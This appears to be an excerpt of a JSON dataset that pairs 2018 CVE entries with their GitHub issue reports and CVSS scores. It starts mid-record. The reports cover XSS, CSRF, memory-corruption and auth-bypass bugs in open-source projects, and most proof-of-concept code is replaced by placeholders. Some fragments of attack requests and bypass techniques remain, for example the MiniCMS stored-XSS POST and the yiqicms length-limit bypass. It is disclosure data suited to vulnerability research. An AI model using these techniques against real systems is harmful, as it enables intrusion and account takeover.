        "Issue_Url_old": "https://github.com/nothings/stb/issues/656",
        "Issue_Url_new": "https://github.com/nothings/stb/issues/656",
        "Repo_new": "nothings/stb",
        "Issue_Created_At": "2018-09-12T02:48:26Z",
        "description": "heap buffer overflow in stbi__out_gif_code. Using the following code we are able to trigger a heap buffer overflow on the attached file FILETAG . ERRORTAG Command line: ERRORTAG Output: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16982",
        "Issue_Url_old": "https://github.com/BYVoid/OpenCC/issues/303",
        "Issue_Url_new": "https://github.com/byvoid/opencc/issues/303",
        "Repo_new": "byvoid/opencc",
        "Issue_Created_At": "2018-09-13T00:30:49Z",
        "description": "Denial of Service in APITAG Hi, I am a security fan. And I found an out of bound pointer in APITAG which could lead to segment fault APITAG of Service if some applications use this library). In APITAG there are two offset which are APITAG and APITAG So if I provide a .ocd file that I can control these two offsets, I can actually make it really big. So the pointers(const char key and const char value) will point to unreadable place. I've attached the POCs for these two pointers. Hope you can respond soon :) FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-16985",
        "Issue_Url_old": "https://github.com/inikep/lizard/issues/18",
        "Issue_Url_new": "https://github.com/inikep/lizard/issues/18",
        "Repo_new": "inikep/lizard",
        "Issue_Created_At": "2018-09-07T07:34:35Z",
        "description": "NULL pointer dereference in lz NUMBERTAG lz5_compress). Hello. I found a NULL pointer dereference in LZ NUMBERTAG Please confirm. Thanks. Summary OS: ubuntu NUMBERTAG bit version: Lz NUMBERTAG POC Download: Lz5 poc null pointer dereference URLTAG test code: APITAG with APITAG details: ERRORTAG It may cause a crash or denial of service.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-17024",
        "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/452",
        "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/452",
        "Repo_new": "monstra-cms/monstra",
        "Issue_Created_At": "2018-08-16T12:35:58Z",
        "description": "XSS APITAG in Monstra dev. Affected software: Monstra dev Type of vulnerability: XSS APITAG Discovered by: Provensec LLC Website: FILETAG Author: Balvinder Singh Description: Stored attacks are those where the injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. Stored XSS is also sometimes referred to as Persistent or Type I XSS. Proof of concept: Step1: Login into the monstra dev cms. Step2: URL: URLTAG Go to the content and choose pages and then create a new page with malicious javascript. FILETAG Step3: Here as the xss got executed for name parameter in new page. URL: URLTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-17026",
        "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/25",
        "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/25",
        "Repo_new": "bg5sbk/minicms",
        "Issue_Created_At": "2018-09-12T12:32:56Z",
        "description": "ERRORTAG page have another Stored XSS Vulnerability. Monstra version NUMBERTAG Exploit uri > URLTAG Parameter > page_meta_title POC: POST PATHTAG ERRORTAG HTTP NUMBERTAG Host NUMBERTAG User Agent: Mozilla NUMBERTAG Linu NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Cookie: admin_username=admin; APITAG Connection: close Upgrade Insecure Requests NUMBERTAG APITAG ERRORTAG APITAG ERRORTAG +&page_name=error ERRORTAG APITAG ERRORTAG APITAG NUMBERTAG A NUMBERTAG A NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-17030",
        "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/342",
        "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/342",
        "Repo_new": "bigtreecms/bigtree-cms",
        "Issue_Created_At": "2018-09-13T01:34:02Z",
        "description": "Authenticated Remote Code Execute. FILE: APITAG APITAG We can set APITAG as APITAG and use the \"\\e\" modifier to execute arbitrary code. poc: FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 5.9,
        "exploitabilityScore": 1.6
    },
    {
        "CVE_ID": "CVE-2018-17031",
        "Issue_Url_old": "https://github.com/gogs/gogs/issues/5397",
        "Issue_Url_new": "https://github.com/gogs/gogs/issues/5397",
        "Repo_new": "gogs/gogs",
        "Issue_Created_At": "2018-09-03T07:46:52Z",
        "description": "Stored XSS vulnerability in viewing raw file.. Gogs version (or commit ref NUMBERTAG Can you reproduce the bug at FILETAG FILETAG Patch add x content type options:nosniff header to prevent browser from mime type sniffing , just as github / gitlab would do. Discoverer Wenxu Wu of Tencent's Xuanwu Lab",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-17039",
        "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/24",
        "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/24",
        "Repo_new": "bg5sbk/minicms",
        "Issue_Created_At": "2018-09-04T04:39:38Z",
        "description": "APITAG reflective XSS in PATHTAG This is a reflective XSS vulnerability because \"echo $_SERVER['REQUEST_URI'];\" in NUMBERTAG line FILETAG CODETAG php APITAG APITAG \");",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-17042",
        "Issue_Url_old": "https://github.com/bcsanches/dbf2txt/issues/2",
        "Issue_Url_new": "https://github.com/bcsanches/dbf2txt/issues/2",
        "Repo_new": "bcsanches/dbf2txt",
        "Issue_Created_At": "2018-08-23T04:36:57Z",
        "description": "Infinite Loop. I used Clang NUMBERTAG and APITAG to build dbf2txt URLTAG , in order to build it with clang in APITAG , the APITAG and APITAG should be motified like following: ERRORTAG This FILETAG can cause infinite loop when executing this command: APITAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-17043",
        "Issue_Url_old": "https://github.com/tsfn/doc2txt/issues/1",
        "Issue_Url_new": "https://github.com/tsfn/doc2txt/issues/1",
        "Repo_new": "tsfn/doc2txt",
        "Issue_Created_At": "2018-08-23T04:49:52Z",
        "description": "Heap Buffer Overflow in Function Storage::init. I used g NUMBERTAG and APITAG to build doc2txt URLTAG , this FILETAG can cause heap buffer overflow in function Storage::init in Storage.cpp when executing this command(pic is just a folder which is used to store the picture in doc file): APITAG This is the ASAN information: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-17045",
        "Issue_Url_old": "https://github.com/maelosoki/MaeloStore/issues/1",
        "Issue_Url_new": "https://github.com/maelosoki/maelostore/issues/1",
        "Repo_new": "maelosoki/maelostore",
        "Issue_Created_At": "2018-08-11T07:41:07Z",
        "description": "Here is a CSRF vulnerability that can change administrator password.. APITAG is a CSRF vulnerability that can change administrator password via APITAG poc: APITAG change the administrator password CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-17046",
        "Issue_Url_old": "https://github.com/magic-FE/translate-man/issues/49",
        "Issue_Url_new": "https://github.com/magic-fe/translate-man/issues/49",
        "Repo_new": "magic-fe/translate-man",
        "Issue_Created_At": "2018-08-15T04:40:08Z",
        "description": "Cross site scripting attack vulnerability. This plugin has the function of automatic translation after word segmentation. When XSS statements are entered, malicious code is executed. For example, \u54c8\u54c8\u54c8 \"> APITAG \" \u6b64\u65f6\u4f1a\u628a\u4e2d\u6587\u7ffb\u8bd1\u6210\u82f1\u6587\uff0c\u5e76\u4e14\u6267\u884cxss\u8bed\u53e5 This will translate Chinese into English and execute XSS statement. FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-17049",
        "Issue_Url_old": "https://github.com/TREYWANGCQU/LANKERS/issues/1",
        "Issue_Url_new": "https://github.com/treywangcqu/lankers/issues/1",
        "Repo_new": "treywangcqu/lankers",
        "Issue_Created_At": "2018-09-09T13:59:19Z",
        "description": "there is a XSS vuln can bypass waf. Hello lankers! I find a reflective XSS can bypass waf in your product,the filter is not complete that such as long \"on\" function and the confirm fuction,I hope you can fix the problem! poc : URLTAG APITAG APITAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-17051",
        "Issue_Url_old": "https://github.com/adilinden/cisco-config-manager/issues/3",
        "Issue_Url_new": "https://github.com/adilinden-oss/cisco-config-manager/issues/3",
        "Repo_new": "adilinden-oss/cisco-config-manager",
        "Issue_Created_At": "2018-09-14T02:44:53Z",
        "description": "Hello, safety Cross site scripting attack vulnerability. Hello, safety Cross site scripting attack APITAG details are as follows NUMBERTAG FILETAG [id parameter] Request GET /cisco APITAG HTTP NUMBERTAG Host: APITAG Accept Encoding: gzip, deflate Accept: / Accept Language: en User Agent: Mozilla NUMBERTAG compatible; MSIE NUMBERTAG Windows NT NUMBERTAG Win NUMBERTAG Trident NUMBERTAG Connection: close Response HTTP NUMBERTAG OK Date: Thu NUMBERTAG Sep NUMBERTAG GMT Server: APITAG APITAG APITAG APITAG X Powered By: APITAG Content Length NUMBERTAG Connection: close Content Type: text/html APITAG APITAG APITAG APITAG APITAG Devices &gt; Edit Device APITAG APITAG alert NUMBERTAG APITAG fe NUMBERTAG z\"> ...[SNIP NUMBERTAG FILETAG [id parameter] Request GET /cisco APITAG HTTP NUMBERTAG Host: APITAG Accept Encoding: gzip, deflate Accept: / Accept Language: en User Agent: Mozilla NUMBERTAG compatible; MSIE NUMBERTAG Windows NT NUMBERTAG Win NUMBERTAG Trident NUMBERTAG Connection: close Response HTTP NUMBERTAG OK Date: Thu NUMBERTAG Sep NUMBERTAG GMT Server: APITAG APITAG APITAG APITAG X Powered By: APITAG Content Length NUMBERTAG Connection: close Content Type: text/html APITAG APITAG APITAG APITAG APITAG Devices &gt; Edit Device APITAG APITAG alert NUMBERTAG APITAG aw0wt\"> ...[SNIP NUMBERTAG FILETAG [name of an arbitrarily supplied URL parameter] Request GET PATHTAG NUMBERTAG APITAG h0gz5 HTTP NUMBERTAG Host: APITAG Accept Encoding: gzip, deflate Accept: / Accept Language: en User Agent: Mozilla NUMBERTAG compatible; MSIE NUMBERTAG Windows NT NUMBERTAG Win NUMBERTAG Trident NUMBERTAG Connection: close Referer: URLTAG Response HTTP NUMBERTAG OK Date: Thu NUMBERTAG Sep NUMBERTAG GMT Server: APITAG APITAG APITAG APITAG X Powered By: APITAG Content Length NUMBERTAG Connection: close Content Type: text/html APITAG APITAG APITAG APITAG APITAG Devices &gt; List Devices APITAG APITAG alert NUMBERTAG APITAG h0gz5?action=add\"> ...[SNIP NUMBERTAG parameters are listed here, and there are also loopholes in other parameters directly displayed.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-17069",
        "Issue_Url_old": "https://github.com/unlcms/UNL-CMS/issues/941",
        "Issue_Url_new": "https://github.com/unlcms/unl-cms/issues/941",
        "Repo_new": "unlcms/unl-cms",
        "Issue_Created_At": "2018-08-04T08:30:31Z",
        "description": "There are two CSRF vulnerabilities that can create new content or update the website settings. APITAG is a CSRF vulnerabilitie that can create new content via APITAG poc: APITAG create a new content ERRORTAG APITAG is a CSRF vulnerabilitie that can update the website settings via APITAG APITAG poc: APITAG update the website settings ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-17072",
        "Issue_Url_old": "https://github.com/tunnuz/json/issues/11",
        "Issue_Url_new": "https://github.com/tunnuz/json/issues/11",
        "Repo_new": "tunnuz/json",
        "Issue_Created_At": "2018-08-13T06:13:31Z",
        "description": "buffer overflow while testing. I run test.cc and get the following message... Should I write something like \"delete A\" at somewhere NUMBERTAG ERROR: APITAG global buffer overflow on address NUMBERTAG c0 at pc NUMBERTAG d NUMBERTAG bp NUMBERTAG ffe NUMBERTAG b NUMBERTAG f0 sp NUMBERTAG ffe NUMBERTAG b NUMBERTAG e8 READ of size NUMBERTAG at NUMBERTAG c0 thread T NUMBERTAG d NUMBERTAG in APITAG PATHTAG NUMBERTAG efb3 in parse_file(char const ) PATHTAG NUMBERTAG b NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG db NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG e NUMBERTAG in _start ( PATHTAG NUMBERTAG c4 is located NUMBERTAG bytes to the right of global variable 'yyleng' defined in PATHTAG NUMBERTAG c0) of size NUMBERTAG SUMMARY: APITAG global buffer overflow PATHTAG in APITAG Shadow bytes around the buggy address NUMBERTAG ac NUMBERTAG f9 f9 f NUMBERTAG ad0: f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG ae NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f NUMBERTAG af0: f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f NUMBERTAG b NUMBERTAG f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f NUMBERTAG b NUMBERTAG f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG b NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG b NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG b NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG b NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG b NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f9 Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-17073",
        "Issue_Url_old": "https://github.com/wernsey/bitmap/issues/1",
        "Issue_Url_new": "https://github.com/wernsey/bitmap/issues/1",
        "Repo_new": "wernsey/bitmap",
        "Issue_Created_At": "2018-08-14T07:13:38Z",
        "description": "SEGV on unknown access while get a bmp's width. System: Ubuntu NUMBERTAG Compile use: clang++ with asan, libpng, libjpeg Here's my program: ERRORTAG and here is my bmp: FILETAG APITAG APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG bp NUMBERTAG df0 sp NUMBERTAG ffc6aced1f0 T0) APITAG signal is caused by a READ memory access. APITAG address points to the zero page NUMBERTAG in bm_width PATHTAG NUMBERTAG f7e in main PATHTAG NUMBERTAG fd NUMBERTAG af7fb NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG b NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG in bm_width NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-17075",
        "Issue_Url_old": "https://github.com/golang/go/issues/27016",
        "Issue_Url_new": "https://github.com/golang/go/issues/27016",
        "Repo_new": "golang/go",
        "Issue_Created_At": "2018-08-16T03:11:50Z",
        "description": "PATHTAG APITAG panic caused by malformed data. What did you do? CODETAG What did you expect to see? No panic exit What did you see instead? ERRORTAG Analysis There are many reasons for panic, but the main reason is: APITAG does not handle some special APITAG meanwhile ERRORTAG does handle these special APITAG thus causing panic. Other test cases that cause the same problem: APITAG System details CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-17076",
        "Issue_Url_old": "https://github.com/logological/gpp/issues/26",
        "Issue_Url_new": "https://github.com/logological/gpp/issues/26",
        "Repo_new": "logological/gpp",
        "Issue_Created_At": "2018-09-14T02:04:09Z",
        "description": "gpp: Segmentation fault. When using the file below, GPP will try to use more memory space than is available on the stack. FILETAG This can lead to denial of service attacks, even remote code execution in specific situations",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-17077",
        "Issue_Url_old": "https://github.com/wacj1425/yiqicms/issues/1",
        "Issue_Url_new": "https://github.com/wacj1425/yiqicms/issues/1",
        "Repo_new": "wacj1425/yiqicms",
        "Issue_Created_At": "2018-08-25T16:56:01Z",
        "description": "There is a storage xss vulnerability in comment title. FILETAG code show as below. Only length restrictions are applied to the $msgtitle. So caused a loophole. We can use / / to bypass the length limit. For example, the first comment title input \" APITAG alert NUMBERTAG and second input NUMBERTAG APITAG \". View comments in the background to trigger the vulnerability. CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-17079",
        "Issue_Url_old": "https://github.com/94fzb/zrlog/issues/38",
        "Issue_Url_new": "https://github.com/94fzb/zrlog/issues/38",
        "Repo_new": "94fzb/zrlog",
        "Issue_Created_At": "2018-09-18T15:55:09Z",
        "description": "There is a stored XSS in the article review area. Comment area does not do input filtering Poc ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-17095",
        "Issue_Url_old": "https://github.com/mpruett/audiofile/issues/51",
        "Issue_Url_new": "https://github.com/mpruett/audiofile/issues/51",
        "Repo_new": "mpruett/audiofile",
        "Issue_Created_At": "2018-07-26T10:56:49Z",
        "description": "A heap buffer overflow has occurred when running sfconvert. A heap buffer overflow has occurred when running sfconvert ERRORTAG And the input file has been put at: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-17095",
        "Issue_Url_old": "https://github.com/mpruett/audiofile/issues/50",
        "Issue_Url_new": "https://github.com/mpruett/audiofile/issues/50",
        "Repo_new": "mpruett/audiofile",
        "Issue_Created_At": "2018-07-26T10:48:55Z",
        "description": "A heap buffer overflow has occurred when running sfconvert. A heap buffer overflow has occurred when running sfconvert. ERRORTAG And the input file has been put at: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-17102",
        "Issue_Url_old": "https://github.com/quickapps/cms/issues/199",
        "Issue_Url_new": "https://github.com/quickapps/cms/issues/199",
        "Repo_new": "quickapps/cms",
        "Issue_Created_At": "2018-08-10T11:57:05Z",
        "description": "CSRF issue that allows attacker to change the administrator password. There is a CSRF vulnerability has been found in the quickappscms,which can change administrator's password. After the administrator login in ,open this html page: POC: APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-17102",
        "Issue_Url_old": "https://github.com/quickapps/cms/issues/187",
        "Issue_Url_new": "https://github.com/quickapps/cms/issues/187",
        "Repo_new": "quickapps/cms",
        "Issue_Created_At": "2018-03-27T05:55:25Z",
        "description": "CSRF issue that allows attacker to create an account. Hello. I'd like to report a security issue on the admin page. Summary this vuln is CSRF vuln that allows creating any kinds of account. When an attacker induce authorized victims to a malicious webpage and make them send requests. a victim creates an account without their intent. Reproduce This is a step how to reproduce NUMBERTAG Access to the html page has payload content after you login to admin( PATHTAG ) page. Then you find an admin account named [test] is created. Payloads CODETAG I think this security issue is not serious. Because attack using this vulnerability requires induction. Event NUMBERTAG this vulnerability is discovered NUMBERTAG Open an issue on Github.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-17103",
        "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1295",
        "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1295",
        "Repo_new": "getsimplecms/getsimplecms",
        "Issue_Created_At": "2018-08-24T06:49:03Z",
        "description": "APITAG NUMBERTAG allows CSRF to change the administrator account's password. in FILETAG . APITAG NUMBERTAG allows CSRF to change the administrator account's pssword. After the administrator login in,open the poc,the administrator account's password will been changed to NUMBERTAG POC: CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-17104",
        "Issue_Url_old": "https://github.com/microweber/microweber/issues/484",
        "Issue_Url_new": "https://github.com/microweber/microweber/issues/484",
        "Repo_new": "microweber/microweber",
        "Issue_Created_At": "2018-08-31T12:33:55Z",
        "description": "There is a CSRF vulnerability that can add the administrator account . After the administrator logged in, open the following page to add an administrator. POC: APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-17104",
        "Issue_Url_old": "https://github.com/microweber/microweber/issues/483",
        "Issue_Url_new": "https://github.com/microweber/microweber/issues/483",
        "Repo_new": "microweber/microweber",
        "Issue_Created_At": "2018-08-31T01:19:15Z",
        "description": "There is a CSRF vulnerability that can add the administrator account . After the administrator logged in, open the following page to add an administrator. POC: CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-17106",
        "Issue_Url_old": "https://github.com/vbirds/Tinyftp/issues/4",
        "Issue_Url_new": "https://github.com/vbirds/tinyftp/issues/4",
        "Repo_new": "vbirds/tinyftp",
        "Issue_Created_At": "2018-08-10T06:45:12Z",
        "description": "Remote Buffer Overflow problem. Hey, sir. Buffer overflow exists in the text variable of the do_mkd function in the ftpproto.c APITAG ebp when new folder and absolute path name length exceeds NUMBERTAG char text NUMBERTAG it just NUMBERTAG byte char dir NUMBERTAG getcwd(dir, sizeof(dir)); sprintf(text, \" %s%s created\", dir, sess >arg);//it more then NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-17107",
        "Issue_Url_old": "https://github.com/tgstation/tgstation-server/issues/690",
        "Issue_Url_new": "https://github.com/tgstation/tgstation-server/issues/690",
        "Repo_new": "tgstation/tgstation-server",
        "Issue_Created_At": "2018-09-20T19:12:04Z",
        "description": "You can login to the server with any username/password combination if someone else is logged in. An explanation of the bug: Back in NUMBERTAG in order to accommodate running the Control Panel using Mono some hooks were added to the WCF communication layer. Detailed in this commit: URLTAG The bug was in this line: URLTAG APITAG is passed in by the framework but the documentation for what the parameter is is virtually non existent: URLTAG Turns out it is a cache of what the previously returned policy was, as Floyd thankfully found out for us. The security patch fixes the issue by creating a new empty list as the return value when password authentication fails as opposed to using the APITAG parameter. If you're wondering why this line: URLTAG didn't prevent the issue. It only invalidated the actual Windows login session, but in the eyes of the server the user was still valid since we just passed that closed handle as a return result. Had access to static files been attempted with a bad login, the request would end up erroring due to trying to impersonate using a closed user token handle. CVETAG This has been fixed in APITAG and versions NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-17113",
        "Issue_Url_old": "https://github.com/teameasy/EasyCMS/issues/7",
        "Issue_Url_new": "https://github.com/teameasy/easycms/issues/7",
        "Repo_new": "teameasy/easycms",
        "Issue_Created_At": "2018-09-14T04:08:20Z",
        "description": "there is a xss vuln in your product. Hi\uff0cteameasy\uff01 When I use your cms,I found a xss vuln in your APITAG flash version is the key of the problem,i hope you can fix it soon. thx FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-17129",
        "Issue_Url_old": "https://github.com/panghusec/exploit/issues/2",
        "Issue_Url_new": "https://github.com/panghusec/exploit/issues/2",
        "Repo_new": "panghusec/exploit",
        "Issue_Created_At": "2018-08-15T06:27:44Z",
        "description": "metinfo NUMBERTAG FILETAG APITAG Vulnerability . POC: APITAG download the metinfo the Latest version from URLTAG url FILETAG APITAG install it and login as admin APITAG request URLTAG url FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.9,
        "impactScore": 3.6,
        "exploitabilityScore": 1.2
    },
